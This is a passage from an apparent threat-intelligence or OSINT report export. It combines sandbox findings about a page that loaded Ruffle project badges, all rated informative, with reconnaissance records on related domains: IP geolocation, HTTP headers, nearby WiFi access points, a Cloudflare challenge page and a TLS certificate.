u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2592"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a20_IE_EarlyTabStart_0x828_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a20_ConnHashTable<2592>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a20_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a20_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_a20_IESQMMUTEX_0_303"\n "IsoScope_a20_ConnHashTable<2592>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1C2F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1C60.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1AEC.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1B9C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1C2E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1D40.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1C5F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1B5C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00002592]\n "610531541889581066_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "ruffle_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "movavi_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "ruffle-nightly-bin_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "test_rust_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "kongregate_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "test_web_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "bubble-shooter_1_.png" has type "PNG image data 200 x 200 8-bit/color RGBA non-interlaced"- [targetUID: 00000000-00002592]\n "dolldivine_1_.png" has type "PNG image data 200 x 200 8-bit/color RGBA non-interlaced"- [targetUID: 00000000-00002592]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00001216]\n "Cab1C2F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1C2F.tmp]- [targetUID: 00000000-00001216]\n "VHJPHVTF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VHJPHVTF.txt]- [targetUID: 00000000-00001216]\n "search_2_.json" has type "JSON data"- [targetUID: 00000000-00002592]\n "Tar1CC1.tmp" has type "data"- Location: [%TEMP%\\Tar1CC1.tmp]- [targetUID: 00000000-00001216]\n "Cab1C60.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1C60.tmp]- [targetUID: 00000000-00001216]\n "crazygames_1_.png" has type "PNG image data 200 x 200 8-bit/color RGBA non-interlaced"- [targetUID: 00000000-00002592]\n "Tar1C90.tmp" has type "data"- Location: [%TEMP%\\Tar1C90.tmp]- [targetUID: 00000000-00001216]\n "armorgames_1_.png" has type "PNG image data 200 x 200 8-bit/color RGBA non-interlaced"- [targetUID: 00000000-00002592]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 172.64.192.12 on port 443"\n "HTTPS traffic to 185.199.108.153 on port 443"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /npm/v/@ruffle-rs/ruffle?color=007acc&logo=npm HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: img.shields.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /discord/610531541889581066?label=&color=7389d8&labelColor=6a7ec2&logoColor=ffffff&logo=discord HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: img.shields.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /github/actions/workflow/status/ruffle-rs/ruffle/test_web.yml?label=Web%20Build&logo=github&branch=master HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: img.shields.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /github/actions/workflow/status/ruffle-rs/ruffle/test_rust.yml?label=Rust%20Build&logo=github&branch=master HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: img.shields.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /aur/version/ruffle-nightly-bin?logo=archlinux HTTP/1.1\nAccept: image/png, | 185.199.111.153 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:443 | 104.21.6.166 |
| 2023-05-12 02:45:52 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 4 | 0 | None | {u'city': u'Montreal', u'security': {u'is_vpn': False}, u'city_geoname_id': 6077243, u'region_geoname_id': 6115047, u'country': u'United States', u'region': u'Quebec', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'H4X', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:51'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:4700:3030::ac43:a8fc', u'continent': u'North America', u'region_iso_code': u'QC'} | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-served-by: cache-lga21959-LGA | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:01:24:F0:65:67) | 37.7813933,-122.3918002 |
| 2023-05-12 02:54:03 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 172.67.135.9 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Dubtronicssid (Net ID: 00:01:24:F0:BB:A4) | 37.780462,-122.390564 |
| 2023-05-12 03:18:06 | URL (Form) | No | Page Information | 0 | 0 | 2 | 0 | None | http://ayhu.xyz | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60363a5a178c')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="49Idt7TVQjX1pBvRrI.6aeE3rlIvevuAC7b5vTR0YGE-1683860053-0-AY2CmFGtsZtnLcnB3KaVSnayJydAFpMBwiHerGE4rgR3JSYE2THMUlIcqEG1Ue8w91NqXc1_LHx6GFVlXiEAESIr_nGQ5go_qchKEn3Zd9LGEn7sjdr5MGswrCl99ImQfUgu6KdI_WivVs4bd90GT85W3eqgKUj3u0FUHAfgMsZls8XQdBKgHld4LM0wMOiwkj4Zv_skkfuoeKho_dzt4CkE8TkBrPt00M8eIbThaadGvVY0ZXacJCnFJrMWgEfguZYQYUBYVuQPCo4vsaoC9FJto9c6wa1TZj17T__0EGfb7iIg-Fe40vQL0GKl1g68OrtJF7bhLP5OSmmfJD-JBdOEbpA042KC5D5FyslCSfE7VL_rZtwmaMGkKhFs9rNjkGtzvRpQkvZRYfyEeWln9xUv2AoyKgo_1wsNTA_ve-XNzmkKtYDqJDpKDva2W3pJ_3486t1fxBPGklTfmIx9NlGkUpFz141VY7sqmJxOdPADiSQrKzSt-fovaHrioNcpkC_a9kgYIR8XX9ZtGjpkxl_IolwlzL--CdPxkW0zMtKJ-ob6rp2YNV1BUrgbluir9hqadqgAXGwt_gZWou60RMf3UaSZgv32iteEpLg55lWyX9LlrUvEr69WGY_mW2VC6sS9celjhcxiPOQLUkE6KOI9dyhMsK_hvZhX7dDzQsZTH4jAvHUf9CQD2LuSWPV3IPZysl2v0-TSOr10-QdcM27ziun4ot0DvTudFu8lZubQ6YgSwrTQ0wlCjvSq6gwpTOqihrt99F-QaEJWo9sY1ul0FhgMesYynTr4n3snoOM31ZGsLMXWKlkFnwUy1gZdrnW6lGoCkCZNGJjETZCrO0I1-blCIjRzIo6n3EQP7MT5qxAPdJn4-285kyLwMrAm9nW0Fi-T32j1LOogUb6WyPmjQkstsoGMIPyZHJWu0K53P0Hp3SPyKBDSdN4PFWJ5HhYglCXZ4frWkFfTdPf1mz5N5hMALh4FLKDLHit2KyOqpzy4LGkpslmmSQV9AzBKoRj1GEO_-FcLHTt9Y_hlt3lZHsDBr1qsBzb2CCXFE8o-Cu7OAduNH_CAS2sCSdUmt1KpWrCRaId6zphb5lrgZKo6-UG1p8eW6scfDanDgxE_uwAeJyjUHxAEdnSiE1KEwJ9jCVqAgp9dVVHeTI4rz44dE3vG-URKonk4rAmwzUrgRitO_d4uGYtEZ4E7qxVnEHPqSPPlSj7XCukbKVCLBJxrlSwrndqrFnPWXTVbd4VDbjuKYax1pPS7eYUGT_UeCCeppPOHUje3Psa1ejipoF94FUlnfTdlsYbhNQHOKrCLTleuO-lGh4FkydbCaYMbMeAAZyBt0xtAetQyd7ldNHUNuC2Nofi66SO1NL6dsaVskjPRRnE6ZvIpqMSXLJLgGQGDosioOi4TetnoLMpoodURiB_nIbRVwEcdjLeqlr_heAlhB9DjGpMi7U2THwVCr2WtE0eC7jgUi7EvjeNq152r1Qqg397yfToV5_wu059jWgynPgNUwC4lcn5G-MBIXveyQXm1Kc3wCLL9zpH8MAPvrg7a-sB2jNRF-Z6W26XqIgEKRCWc-Pxvv_Wf4vRraOQIcroiI7Bz-VZanQ8qRRCNJq9kL7QMtAUM-80bmDBTJgrVoo5PdyUEhsNJHqX9OXSul2XByOb4cFHCten8oYXlq-xQqbPW5cLy025uWQytdBIECEqK0e5vKcu_KE0Uj51a0tZyH3JcwbPPE_fH4pbZorm5Kg1q7pYpinkOp5o93d4llyQL17ps--AQEqRvOWDfy9ih2KJc_BE5lNLHq-v1h4WyL3qch3dFUNrf6TKv44d5E5ZODSf9MR91_YJ1LP3HF-0gnEEbwwFvu5w7kqPMreWbivd9zybQFoONhHZIvue3MsgjfZ1vLvfzi0_pLzPV9XnL3aZnuVWNQ5m-tjTF6DVwD4heQQWtO8aBzn7YpoO7pmb5XcFPRZknXUl9vyibdHsym3ALRgx4Xf0sXY0Egq8vPrGtUmUt_qhEJTk5P3R0wsoRFa49pkuv79cmFbVV6UYUcsY_Ht1FZEPOAMMuij1BfHolOncuoa8HH91s4MToLK5e4ZXLCuwnrhU1Iz07g8_F8FiO-szvC0BSEfX52p_c3LsFOQ8KHGFOOtlIbkgQfFx7vErT1y0UZSuoR1HN5mwxz005itrk8qw-cU_4QXYVr0nnwhQQexYkVxHYLRxlHlGu9xonuO_9eyVCe8GyN79j4Enif4_dFDplAW77cjHRHWhMTCE5n_dU-96YMnkyFZr2m1KSUUWqQndQzduR6sMHEDQuErbPvLqIaJ3xphVgcTAzrMD12jvSU-bukvEL-wHHmzTDiCAItW9qw0XBzVZ7Ll736rJi4i9XorZ16wxKlOhw9SC6r707lQ43XMPgmmt8I71p5Y7NNqy-niBv8MJGeGRjObImH8n6JVBEQ7vEkMfTCD53zst2b-4V3RTMfSwntBlaoqZZYZdNBZBlFTqFK5PeKUk6cNexkn95wQmcJcuYO0vxq3IUpP6X">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '94216',
cRay: '7c5f60363a5a178c',
cHash: 'a8c2f7f784ba63b',
cUPMDTk: "\/?__cf_chl_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'TetCTvIHDoj9yN1Q4CtSp4oIXaz0U+HIhBy4s5iV5musPrd3qRRyHc90BWI/jzQYM3TsRZmdrYIIHsGBQ3rbPW3lOoqcfi5CawfhzjAeMsvCOqeqTs713ExQ08oz+vVkhRriZ7KOQkOV4gBocW2cG02BuWOMw473YNbayiyCJXNB9iidY4XwtRQU/oWv27be04lXHovk9dndBeKEBgbit5s9pMfaIl2tziG8KWxKRTXRRw94m0HSrFr22Qs7or0V3+F4nT0oqiT9CcwY4AtGAb1j1UI+nGhI1ep4c+HVRPQEv5JYmnedW8parB9/FBeu/+bgHoTPsvVjRcT+Zj3bh9L0pk5dvmAuwrAT2+Y12w3HYJ8EUaGW5hUxEwUm3qO45VrjFOfVZH1XXhpCDpIgdaMP38+Gmi8gCSX1fmRmElBR13XOvdIqlcHPrE3eBXTlLOzhqpjHznAyvR3aMgy5C0JAffwSrtelgLWCQTUkAhSVivNH0wfno5PZypoOVrpGZ9n0kycNgQnfvHpFI9kAmKT2MlQ1LuH6zqEPZLkiqKrLJjogiPERqj0XyjcrK42c',
t: 'MTY4Mzg2MDA1My40NzkwMDA=',
m: 'X3NUo99x/4mGPFmrz69qVs5k5pJtmgeVcyYRkA87vXs=',
i1: 'Sn1NO9u6sfSr5lno+YjwEg==',
i2: 'LxAqQZecIh4w4zR/ETAJ7g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60363a5a178c');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60363a5a178c';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:44:41 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:89:fe:30:65:f6:62:86:64:4f:34:07:5e:a0:a9:be:d2:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:55:50 2022 GMT
Not After : Mar 13 15:55:49 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b5:70:98:56:04:62:cd:9d:91:8b:97:7d:1f:67:
df:fd:40:4a:9e:a1:91:56:27:b2:c2:dc:db:18:7e:
90:b1:64:8c:6c:fd:2c:13:2d:ed:56:f7:36:ce:08:
2a:4a:36:14:30:02:df:d6:0f:d4:6c:7a:48:c9:01:
c5:bb:35:51:b6:01:95:98:7e:7b:4e:66:e0:84:62:
5a:92:58:14:ee:5f:0c:a5:3c:c0:6e:d5:a8:57:bb:
5b:46:82:bd:d9:28:fb:d9:2e:3c:cc:45:f6:41:c3:
2e:de:7e:83:17:a8:54:29:45:21:09:97:4c:fd:ed:
49:50:3b:81:1e:21:32:31:1d:79:ca:01:4a:ed:57:
fb:ff:6e:4d:44:22:c0:1f:54:2a:4f:e7:63:84:83:
2d:a4:25:2d:2e:38:54:17:99:ab:10:e9:5b:8e:64:
39:42:16:09:1d:92:05:aa:12:42:2e:33:56:a8:cb:
fa:cc:fe:15:09:1e:32:19:c2:f5:b5:fb:c3:50:cf:
4f:6c:46:9f:4a:26:a1:f6:b4:2c:c4:b6:e7:cf:c8:
0d:46:d3:02:56:c6:06:76:a6:5d:74:73:25:8a:74:
76:91:9c:94:b2:8b:47:bc:85:62:1a:aa:eb:32:0b:
97:18:b1:e4:f7:a7:1d:6d:50:4d:60:e9:30:d9:24:
3b:77:00:5c:86:fe:be:60:06:dd:41:13:db:73:e0:
c7:a6:69:d8:87:8d:f3:d9:19:43:f8:26:44:9c:46:
67:0b:09:0b:9b:db:37:73:fe:d3:c4:35:3e:63:88:
04:bf:f1:31:5f:68:76:f4:78:92:74:5e:90:26:85:
91:b2:c5:89:7c:e7:fd:90:5c:fb:08:d7:ec:7e:80:
bb:0c:21:cf:d6:c2:40:71:78:96:82:d9:32:54:0f:
4d:96:8c:31:42:ff:aa:a0:84:60:76:09:ee:ce:f1:
29:2b:47:e4:6d:53:c1:f3:6f:e1:43:b1:b5:0b:95:
35:33:7b:67:7a:23:ed:15:76:d9:5e:2f:96:95:57:
e5:56:fa:b4:14:d2:53:87:b2:95:ae:4a:c1:23:a4:
44:71:bc:56:67:dd:1d:18:ac:3b:6c:70:1c:35:da:
1c:0d:c0:ed:48:c3:e4:31:1a:74:9f:07:d7:d2:a2:
66:5e:12:e5:58:f2:5f:0c:2a:db:70:d9:e5:73:16:
75:7c:43:25:43:03:62:18:4f:72:50:53:b3:8a:1a:
b1:9c:46:ec:4a:d2:cb:cc:b8:7b:e9:84:cb:e1:b2:
ab:6c:e1:58:25:e1:54:f1:50:6c:98:68:55:60:cd:
f6:ef:3e:df:e4:c2:e3:11:66:4c:2d:50:b9:ef:ad:
19:0b:a7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:B4:9F:3E:13:AF:1E:ED:5D:1E:C0:B3:15:A8:37:84:5F:58:79:25
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 13 16:55:50.449 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:83:63:FF:85:C1:92:6A:F0:48:97:56:
6A:A1:9A:CD:CD:96:31:BB:FB:75:C5:76:C0:D5:93:B6:
FA:22:8A:0A:B2:02:21:00:D0:25:C4:C4:9C:87:C7:8A:
D8:88:7C:0F:ED:E3:EE:A9:F5:8D:1E:8A:7D:57:63:8B:
34:EA:A9:AA:0E:B7:1F:86
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 16:55:50.476 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:54:A3:38:5D:40:4F:67:06:7D:10:18:A9:
8D:94:8F:5C:FA:96:C9:CD:18:CE:28:22:68:39:92:D0:
96:C8:FF:F6:02:20:1D:2D:AD:B7:86:08:EE:7E:EE:05:
FA:EC:70:98:F7:7B:A0:74:8A:7A:10:64:BF:3C:10:A9:
7A:16:EC:A7:CC:4B
Signature Algorithm: sha256WithRSAEncryption
20:7b:5f:2b:bd:28:eb:4d:bf:d7:77:bb:a0:1a:8f:df:78:60:
37:c8:a6:0a:7a:b4:17:f5:92:59:69:c6:b8:6a:7b:eb:7c:d1:
4d:b7:1f:8a:b6:a8:fe:6f:70:f7:71:12:28:35:3b:1d:c9:e2:
3e:5a:b9:ce:51:09:75:8e:66:10:ba:ac:7a:bf:80:93:80:59:
81:68:1a:f1:4b:74:5d:68:98:fd:b9:d6:3c:7d:27:77:0e:6b:
c3:83:68:c1:53:51:8c:92:a8:96:95:40:f7:6c:ab:93:47:5e:
47:42:3f:43:61:57:3a:c1:fd:4a:c1:60:c0:f5:9f:e5:3f:aa:
cd:53:b5:a3:5d:e8:f4:0a:26:e5:70:df:34:b0:ae:1c:99:2a:
3c:31:a1:a9:06:b4:05:fd:9b:44:cb:42:87:c4:a0:d2:e7:7a:
95:fc:6a:ad:e6:f1:50:0d:21:cd:f5:24:0f:dc:98:36:59:3b:
40:6e:0f:4b:38:de:68:41:9a:1e:f9:be:5b:6a:36:f0:9b:22:
e3:a1:e1:ad:96:f6:ba:a2:d1:f4:e2:12:cb:ab:1f:bb:9a:53:
07:6b:08:bd:4c:58:68:74:4f:75:3c:83:28:de:71:51:c8:1c:
8f:ca:5e:df:81:b4:f2:74:1f:18:af:29:fa:69:d6:b5:65:a9:
11:13:ef:a4
|
